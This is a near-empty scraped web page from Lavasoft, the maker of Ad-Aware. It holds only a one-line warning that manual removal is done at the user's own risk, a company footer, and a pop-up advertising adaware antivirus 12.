*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now